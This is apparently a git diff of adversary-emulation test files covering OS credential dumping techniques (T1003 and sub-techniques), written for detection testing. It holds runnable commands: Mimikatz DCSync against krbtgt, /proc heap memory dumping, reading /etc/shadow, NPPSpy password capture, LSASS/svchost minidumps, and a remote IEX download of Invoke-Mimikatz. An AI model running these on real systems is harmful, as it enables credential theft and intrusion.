<blockquote>Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
Members of the Administrators, Domain Admins, and Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data(Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003)(Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098).(Citation: InsiderThreat ChangeNTLM July 2017)
DCSync functionality has been included in the "lsadump" module in [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.(Citation: Microsoft NRPC Dec 2017)</blockquote>
## Atomic Tests
- [Atomic Test #1 - DCSync (Active Directory)](#atomic-test-1---dcsync-active-directory)
<br/>
## Atomic Test #1 - DCSync (Active Directory)
Active Directory attack allowing retrieval of account information without accessing memory or retrieving the NTDS database.
Works against a remote Windows Domain Controller using the replication protocol.
Privileges required: domain admin or domain controller account (by default), or any other account with required rights.
[Reference](https://adsecurity.org/?p=1729)
**Supported Platforms:** Windows
**auto_generated_guid:** 129efd28-8497-4c87-a1b0-73b9a870ca3e
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | Targeted Active Directory domain | string | example.com|
| user | Targeted user | string | krbtgt|
| mimikatz_path | Mimikatz windows executable | path | %tmp%&#92;mimikatz&#92;x64&#92;mimikatz.exe|
#### Attack Commands: Run with `command_prompt`!
```cmd
#{mimikatz_path} "lsadump::dcsync /domain:#{domain} /user:#{user}@#{domain}" "exit"
```
#### Dependencies: Run with `powershell`!
##### Description: Mimikatz executor must exist on disk and at specified location (#{mimikatz_path})
##### Check Prereq Commands:
```powershell
$mimikatz_path = cmd /c echo #{mimikatz_path}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
$mimikatz_path = cmd /c echo #{mimikatz_path}
Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
```
<br/>
atomics/T1003.006/T1003.006.yaml
-43
View File
@@ -1,43 +0,0 @@
attack_technique: T1003.006
display_name: "OS Credential Dumping: DCSync"
atomic_tests:
- name: DCSync (Active Directory)
auto_generated_guid: 129efd28-8497-4c87-a1b0-73b9a870ca3e
description: |
Active Directory attack allowing retrieval of account information without accessing memory or retrieving the NTDS database.
Works against a remote Windows Domain Controller using the replication protocol.
Privileges required: domain admin or domain controller account (by default), or any other account with required rights.
[Reference](https://adsecurity.org/?p=1729)
supported_platforms:
- windows
input_arguments:
domain:
description: Targeted Active Directory domain
type: string
default: example.com
user:
description: Targeted user
type: string
default: krbtgt
mimikatz_path:
description: Mimikatz windows executable
type: path
default: '%tmp%\mimikatz\x64\mimikatz.exe'
dependency_executor_name: powershell
dependencies:
- description: |
Mimikatz executor must exist on disk and at specified location (#{mimikatz_path})
prereq_command: |
$mimikatz_path = cmd /c echo #{mimikatz_path}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
get_prereq_command: |
$mimikatz_path = cmd /c echo #{mimikatz_path}
Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
executor:
name: command_prompt
elevation_required: false
command: |
#{mimikatz_path} "lsadump::dcsync /domain:#{domain} /user:#{user}@#{domain}" "exit"
atomics/T1003.007/T1003.007.md
-142
View File
@@ -1,142 +0,0 @@
# T1003.007 - Proc Filesystem
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/007)
<blockquote>Adversaries may gather credentials from information stored in the Proc filesystem or <code>/proc</code>. The Proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively.
This functionality has been implemented in the MimiPenguin(Citation: MimiPenguin GitHub May 2017), an open source tool inspired by Mimikatz. The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.</blockquote>
## Atomic Tests
- [Atomic Test #1 - Dump individual process memory with sh (Local)](#atomic-test-1---dump-individual-process-memory-with-sh-local)
- [Atomic Test #2 - Dump individual process memory with Python (Local)](#atomic-test-2---dump-individual-process-memory-with-python-local)
<br/>
## Atomic Test #1 - Dump individual process memory with sh (Local)
Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
copy process memory to an external file so it can be searched or exfiltrated later.
**Supported Platforms:** Linux
**auto_generated_guid:** 7e91138a-8e74-456d-a007-973d67a0bb80
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | /tmp/T1003.007.bin|
| script_path | Path to script generating the target process | Path | /tmp/T1003.007.sh|
| pid_term | Unique string to use to identify target process | String | T1003.007|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sh #{script_path}
PID=$(pgrep -n -f "#{pid_term}")
HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /proc/"$PID"/maps | grep heap | cut -d' ' -f 1)
MEM_START=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f1))))
MEM_STOP=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f2))))
MEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))
dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE"
grep -i "PASS" "#{output_file}"
```
#### Cleanup Commands:
```sh
rm -f "#{output_file}"
```
#### Dependencies: Run with `sh`!
##### Description: Script to launch target process must exist
##### Check Prereq Commands:
```sh
test -f #{script_path}
grep "#{pid_term}" #{script_path}
```
##### Get Prereq Commands:
```sh
echo '#!/bin/sh' > #{script_path}
echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
```
<br/>
<br/>
## Atomic Test #2 - Dump individual process memory with Python (Local)
Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to
copy a process's heap memory to an external file so it can be searched or exfiltrated later.
**Supported Platforms:** Linux
**auto_generated_guid:** 437b2003-a20d-4ed8-834c-4964f24eec63
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | /tmp/T1003.007.bin|
| script_path | Path to script generating the target process | Path | /tmp/T1003.007.sh|
| python_script | Path to script generating the target process | Path | PathToAtomicsFolder/T1003.007/src/dump_heap.py|
| pid_term | Unique string to use to identify target process | String | T1003.007|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sh #{script_path}
PID=$(pgrep -n -f "#{pid_term}")
PYTHON=$(which python || which python3 || which python2)
$PYTHON #{python_script} $PID #{output_file}
grep -i "PASS" "#{output_file}"
```
#### Cleanup Commands:
```sh
rm -f "#{output_file}"
```
#### Dependencies: Run with `sh`!
##### Description: Script to launch target process must exist
##### Check Prereq Commands:
```sh
test -f #{script_path}
grep "#{pid_term}" #{script_path}
```
##### Get Prereq Commands:
```sh
echo '#!/bin/sh' > #{script_path}
echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
```
##### Description: Requires Python
##### Check Prereq Commands:
```sh
(which python || which python3 || which python2)
```
##### Get Prereq Commands:
```sh
echo "Python 2.7+ or 3.4+ must be installed"
```
<br/>
atomics/T1003.007/T1003.007.yaml
-106
View File
@@ -1,106 +0,0 @@
---
attack_technique: T1003.007
display_name: 'OS Credential Dumping: Proc Filesystem'
atomic_tests:
- name: Dump individual process memory with sh (Local)
auto_generated_guid: 7e91138a-8e74-456d-a007-973d67a0bb80
description: |
Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
copy process memory to an external file so it can be searched or exfiltrated later.
supported_platforms:
- linux
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
default: /tmp/T1003.007.bin
script_path:
description: Path to script generating the target process
type: Path
default: /tmp/T1003.007.sh
pid_term:
description: Unique string to use to identify target process
type: String
default: T1003.007
dependencies:
- description: |
Script to launch target process must exist
prereq_command: |
test -f #{script_path}
grep "#{pid_term}" #{script_path}
get_prereq_command: |
echo '#!/bin/sh' > #{script_path}
echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
executor:
name: sh
elevation_required: true
command: |
sh #{script_path}
PID=$(pgrep -n -f "#{pid_term}")
HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /proc/"$PID"/maps | grep heap | cut -d' ' -f 1)
MEM_START=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f1))))
MEM_STOP=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f2))))
MEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))
dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE"
grep -i "PASS" "#{output_file}"
cleanup_command: |
rm -f "#{output_file}"
- name: Dump individual process memory with Python (Local)
auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63
description: |
Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to
copy a process's heap memory to an external file so it can be searched or exfiltrated later.
supported_platforms:
- linux
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
default: /tmp/T1003.007.bin
script_path:
description: Path to script generating the target process
type: Path
default: /tmp/T1003.007.sh
python_script:
description: Path to script generating the target process
type: Path
default: PathToAtomicsFolder/T1003.007/src/dump_heap.py
pid_term:
description: Unique string to use to identify target process
type: String
default: T1003.007
dependencies:
- description: |
Script to launch target process must exist
prereq_command: |
test -f #{script_path}
grep "#{pid_term}" #{script_path}
get_prereq_command: |
echo '#!/bin/sh' > #{script_path}
echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
- description: |
Requires Python
prereq_command: |
(which python || which python3 || which python2)
get_prereq_command: |
echo "Python 2.7+ or 3.4+ must be installed"
executor:
name: sh
elevation_required: true
command: |
sh #{script_path}
PID=$(pgrep -n -f "#{pid_term}")
PYTHON=$(which python || which python3 || which python2)
$PYTHON #{python_script} $PID #{output_file}
grep -i "PASS" "#{output_file}"
cleanup_command: |
rm -f "#{output_file}"
atomics/T1003.007/src/dump_heap.py
-31
View File
@@ -1,31 +0,0 @@
#!/usr/bin/env python
'''Dump a process's heap space to disk
Usage:
python dump_proc.py <PID> <filepath>
'''
import argparse
parser = argparse.ArgumentParser(description='Dump a process\'s heap space to disk')
parser.add_argument('pid', type=int, help='ID of process to dump')
parser.add_argument('filepath', help='A filepath to save output to')
args = parser.parse_args()
process_id = args.pid
output_file = args.filepath
with open("/proc/{}/maps".format(process_id), "r") as maps_file:
# example: 5566db1a6000-5566db4f0000 rw-p 00000000 00:00 0 [heap]
heap_line = next(filter(lambda line: "[heap]" in line, maps_file))
heap_range = heap_line.split(' ')[0]
mem_start = int(heap_range.split('-')[0], 16)
mem_stop = int(heap_range.split('-')[1], 16)
mem_size = mem_stop - mem_start
with open("/proc/{}/mem".format(process_id), "rb") as mem_file:
mem_file.seek(mem_start, 0)
heap_mem = mem_file.read(mem_size)
with open(output_file, "wb") as ofile:
ofile.write(heap_mem)
atomics/T1003.008/T1003.008.md
-90
View File
@@ -1,90 +0,0 @@
# T1003.008 - /etc/passwd and /etc/shadow
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/008)
<blockquote>Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and <code>/etc/shadow</code> to enable offline password cracking. Most modern Linux operating systems use a combination of <code>/etc/passwd</code> and <code>/etc/shadow</code> to store user account information including password hashes in <code>/etc/shadow</code>. By default, <code>/etc/shadow</code> is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
The Linux utility, unshadow, can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper:(Citation: nixCraft - John the Ripper) <code># /usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db</code>
</blockquote>
## Atomic Tests
- [Atomic Test #1 - Access /etc/shadow (Local)](#atomic-test-1---access-etcshadow-local)
- [Atomic Test #2 - Access /etc/passwd (Local)](#atomic-test-2---access-etcpasswd-local)
<br/>
## Atomic Test #1 - Access /etc/shadow (Local)
/etc/shadow file is accessed in Linux environments
**Supported Platforms:** Linux
**auto_generated_guid:** 3723ab77-c546-403c-8fb4-bb577033b235
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | /tmp/T1003.008.txt|
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```bash
sudo cat /etc/shadow > #{output_file}
cat #{output_file}
```
#### Cleanup Commands:
```bash
rm -f #{output_file}
```
<br/>
<br/>
## Atomic Test #2 - Access /etc/passwd (Local)
/etc/passwd file is accessed in Linux environments
**Supported Platforms:** Linux
**auto_generated_guid:** 60e860b6-8ae6-49db-ad07-5e73edd88f5d
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | /tmp/T1003.008.txt|
#### Attack Commands: Run with `sh`!
```sh
cat /etc/passwd > #{output_file}
cat #{output_file}
```
#### Cleanup Commands:
```sh
rm -f #{output_file}
```
<br/>
atomics/T1003.008/T1003.008.yaml
-40
View File
@@ -1,40 +0,0 @@
attack_technique: T1003.008
display_name: 'OS Credential Dumping: /etc/passwd and /etc/shadow'
atomic_tests:
- name: Access /etc/shadow (Local)
auto_generated_guid: 3723ab77-c546-403c-8fb4-bb577033b235
description: |
/etc/shadow file is accessed in Linux environments
supported_platforms:
- linux
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
default: /tmp/T1003.008.txt
executor:
command: |
sudo cat /etc/shadow > #{output_file}
cat #{output_file}
cleanup_command: |
rm -f #{output_file}
name: bash
elevation_required: true
- name: Access /etc/passwd (Local)
auto_generated_guid: 60e860b6-8ae6-49db-ad07-5e73edd88f5d
description: |
/etc/passwd file is accessed in Linux environments
supported_platforms:
- linux
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
default: /tmp/T1003.008.txt
executor:
command: |
cat /etc/passwd > #{output_file}
cat #{output_file}
cleanup_command: |
rm -f #{output_file}
name: sh
atomics/T1003/T1003.md
+263 -132
View File
@@ -1,175 +1,306 @@
# T1003 - OS Credential Dumping
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003)
<blockquote>Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
# T1003 - Credential Dumping
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1003)
<blockquote>Credential dumping is the process of obtaining account login and password information, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Several of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.
</blockquote>
Several of the tools mentioned in this technique may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.
### Windows
#### SAM (Security Accounts Manager)
The SAM is a database file that contains local accounts for the host, typically those found with the net user command. To enumerate the SAM database, system level access is required.
 
A number of tools can be used to retrieve the SAM file through in-memory techniques:
* pwdumpx.exe
* [gsecdump](https://attack.mitre.org/software/S0008)
* [Mimikatz](https://attack.mitre.org/software/S0002)
* secretsdump.py
Alternatively, the SAM can be extracted from the Registry with [Reg](https://attack.mitre.org/software/S0075):
* <code>reg save HKLM\sam sam</code>
* <code>reg save HKLM\system system</code>
Creddump7 can then be used to process the SAM database locally to retrieve hashes. (Citation: GitHub Creddump7)
Notes:
Rid 500 account is the local, in-built administrator.
Rid 501 is the guest account.
User accounts start with a RID of 1,000+.
#### Cached Credentials
The DCC2 (Domain Cached Credentials version 2) hash, used by Windows Vista and newer caches credentials when the domain controller is unavailable. The number of default cached credentials varies, and this number can be altered per system. This hash does not allow pass-the-hash style attacks.
 
A number of tools can be used to retrieve the SAM file through in-memory techniques.
* pwdumpx.exe
* [gsecdump](https://attack.mitre.org/software/S0008)
* [Mimikatz](https://attack.mitre.org/software/S0002)
Alternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials.
Notes:
Cached credentials for Windows Vista are derived using PBKDF2.
#### Local Security Authority (LSA) Secrets
With SYSTEM access to a host, the LSA secrets often allows trivial access from a local account to domain-based account credentials. The Registry is used to store the LSA secrets.
 
When services are run under the context of local or domain users, their passwords are stored in the Registry. If auto-logon is enabled, this information will be stored in the Registry as well.
 
A number of tools can be used to retrieve the SAM file through in-memory techniques.
* pwdumpx.exe
* [gsecdump](https://attack.mitre.org/software/S0008)
* [Mimikatz](https://attack.mitre.org/software/S0002)
* secretsdump.py
Alternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials.
Notes:
The passwords extracted by his mechanism are UTF-16 encoded, which means that they are returned in plaintext.
Windows 10 adds protections for LSA Secrets described in Mitigation.
#### NTDS from Domain Controller
Active Directory stores information about members of the domain including devices and users to verify credentials and define access rights. The Active Directory domain database is stored in the NTDS.dit file. By default the NTDS file will be located in %SystemRoot%\NTDS\Ntds.dit of a domain controller. (Citation: Wikipedia Active Directory)
The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.
* Volume Shadow Copy
* secretsdump.py
* Using the in-built Windows tool, ntdsutil.exe
* Invoke-NinjaCopy
#### Group Policy Preference (GPP) Files
Group Policy Preferences (GPP) are tools that allowed administrators to create domain policies with embedded credentials. These policies, amongst other things, allow administrators to set local accounts.
These group policies are stored in SYSVOL on a domain controller, this means that any domain user can view the SYSVOL share and decrypt the password (the AES private key was leaked on-line. (Citation: Microsoft GPP Key) (Citation: SRD GPP)
The following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:
* Metasploits post exploitation module: "post/windows/gather/credentials/gpp"
* Get-GPPPassword (Citation: Obscuresecurity Get-GPPPassword)
* gpprefdecrypt.py
Notes:
On the SYSVOL share, the following can be used to enumerate potential XML files.
dir /s * .xml
#### Service Principal Names (SPNs)
See [Kerberoasting](https://attack.mitre.org/techniques/T1208).
#### Plaintext Credentials
After a user logs on to a system, a variety of credentials are generated and stored in the Local Security Authority Subsystem Service (LSASS) process in memory. These credentials can be harvested by a administrative user or SYSTEM.
SSPI (Security Support Provider Interface) functions as a common interface to several Security Support Providers (SSPs): A Security Support Provider is a dynamic-link library (DLL) that makes one or more security packages available to applications.
The following SSPs can be used to access credentials:
Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges. (Citation: TechNet Blogs Credential Protection)
Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
CredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services. (Citation: Microsoft CredSSP)
 
The following tools can be used to enumerate credentials:
* [Windows Credential Editor](https://attack.mitre.org/software/S0005)
* [Mimikatz](https://attack.mitre.org/software/S0002)
As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.
For example, on the target host use procdump:
* <code>procdump -ma lsass.exe lsass_dump</code>
Locally, mimikatz can be run:
* <code>sekurlsa::Minidump lsassdump.dmp</code>
* <code>sekurlsa::logonPasswords</code>
#### DCSync
DCSync is a variation on credential dumping which can be used to acquire sensitive information from a domain controller. Rather than executing recognizable malicious code, the action works by abusing the domain controller's application programming interface (API) (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller. Any members of the Administrators, Domain Admins, Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data (Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a Golden Ticket for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1097) (Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098). (Citation: InsiderThreat ChangeNTLM July 2017) DCSync functionality has been included in the "lsadump" module in Mimikatz. (Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol. (Citation: Microsoft NRPC Dec 2017)
### Linux
#### Proc filesystem
The /proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively. This functionality has been implemented in the [MimiPenguin](https://attack.mitre.org/software/S0179), an open source tool inspired by [Mimikatz](https://attack.mitre.org/software/S0002). The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.</blockquote>
## Atomic Tests
- [Atomic Test #1 - Gsecdump](#atomic-test-1---gsecdump)
- [Atomic Test #1 - Powershell Mimikatz](#atomic-test-1---powershell-mimikatz)
- [Atomic Test #2 - Credential Dumping with NPPSpy](#atomic-test-2---credential-dumping-with-nppspy)
- [Atomic Test #2 - Gsecdump](#atomic-test-2---gsecdump)
- [Atomic Test #3 - Dump svchost.exe to gather RDP credentials](#atomic-test-3---dump-svchostexe-to-gather-rdp-credentials)
- [Atomic Test #3 - Windows Credential Editor](#atomic-test-3---windows-credential-editor)
- [Atomic Test #4 - Registry dump of SAM, creds, and secrets](#atomic-test-4---registry-dump-of-sam-creds-and-secrets)
- [Atomic Test #5 - Dump LSASS.exe Memory using ProcDump](#atomic-test-5---dump-lsassexe-memory-using-procdump)
- [Atomic Test #6 - Dump LSASS.exe Memory using Windows Task Manager](#atomic-test-6---dump-lsassexe-memory-using-windows-task-manager)
- [Atomic Test #7 - Offline Credential Theft With Mimikatz](#atomic-test-7---offline-credential-theft-with-mimikatz)
- [Atomic Test #8 - Dump Active Directory Database with NTDSUtil](#atomic-test-8---dump-active-directory-database-with-ntdsutil)
<br/>
## Atomic Test #1 - Gsecdump
Dump credentials from memory using Gsecdump.
Upon successful execution, you should see domain\username's following by two 32 characters hashes.
If you see output that says "compat: error: failed to create child process", execution was likely blocked by Anti-Virus.
You will receive only error output if you do not run this test from an elevated context (run as administrator)
If you see a message saying "The system cannot find the path specified", try using the get-prereq_commands to download and install Gsecdump first.
## Atomic Test #1 - Powershell Mimikatz
Dumps Credentials via Powershell by invoking a remote mimikatz script
**Supported Platforms:** Windows
**auto_generated_guid:** 96345bfc-8ae7-4b6a-80b7-223200f24ef9
#### Inputs:
| Name | Description | Type | Default Value |
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| gsecdump_exe | Path to the Gsecdump executable | Path | PathToAtomicsFolder&#92;T1003&#92;bin&#92;gsecdump.exe|
| gsecdump_bin_hash | File hash of the Gsecdump binary file | String | 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC|
| gsecdump_url | Path to download Gsecdump binary file | url | https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe|
| remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
#{gsecdump_exe} -a
#### Run it with `powershell`!
```
#### Dependencies: Run with `powershell`!
##### Description: Gsecdump must exist on disk at specified location (#{gsecdump_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1}
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe"
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1")
if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}){
Move-Item $binpath "#{gsecdump_exe}"
}
```
<br/>
<br/>
## Atomic Test #2 - Credential Dumping with NPPSpy
Changes ProviderOrder Registry Key Parameter and creates Key for NPPSpy.
After user's logging in cleartext password is saved in C:\NPPSpy.txt.
Clean up deletes the files and reverses Registry changes.
NPPSpy Source: https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy
## Atomic Test #2 - Gsecdump
https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5
**Supported Platforms:** Windows
**auto_generated_guid:** 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Copy-Item "$env:Temp\NPPSPY.dll" -Destination "C:\Windows\System32"
$path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
$UpdatedValue = $Path.PROVIDERORDER + ",NPPSpy"
Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue
$rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy -ErrorAction Ignore
$rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Class" -Value 2 -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Name" -Value NPPSpy -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%\System32\NPPSPY.dll" -ErrorAction Ignore
echo "[!] Please, logout and log back in. Cleartext password for this account is going to be located in C:\NPPSpy.txt"
#### Run it with `command_prompt`!
```
#### Cleanup Commands:
```powershell
$cleanupPath = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
$cleanupUpdatedValue = $cleanupPath.PROVIDERORDER
$cleanupUpdatedValue = $cleanupUpdatedValue -replace ',NPPSpy',''
Set-ItemProperty -Path $cleanupPath.PSPath -Name "PROVIDERORDER" -Value $cleanupUpdatedValue
Remove-Item -Path "HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy" -Recurse -ErrorAction Ignore
Remove-Item C:\NPPSpy.txt -ErrorAction Ignore
Remove-Item C:\Windows\System32\NPPSpy.dll -ErrorAction Ignore
gsecdump -a
```
#### Dependencies: Run with `powershell`!
##### Description: NPPSpy.dll must be available in local temp directory
##### Check Prereq Commands:
```powershell
if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "$env:Temp\NPPSPY.dll"
```
<br/>
<br/>
## Atomic Test #3 - Dump svchost.exe to gather RDP credentials
The svchost.exe contains the RDP plain-text credentials.
Source: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/
Upon successful execution, you should see the following file created $env:TEMP\svchost-exe.dmp.
## Atomic Test #3 - Windows Credential Editor
http://www.ampliasecurity.com/research/windows-credentials-editor/
**Supported Platforms:** Windows
**auto_generated_guid:** d400090a-d8ca-4be0-982e-c70598a23de9
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where resulting data should be placed | Path | output.txt|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
$ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)
if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full
#### Run it with `command_prompt`!
```
#### Cleanup Commands:
```powershell
Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore
wce -o #{output_file}
```
<br/>
<br/>
## Atomic Test #4 - Registry dump of SAM, creds, and secrets
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated
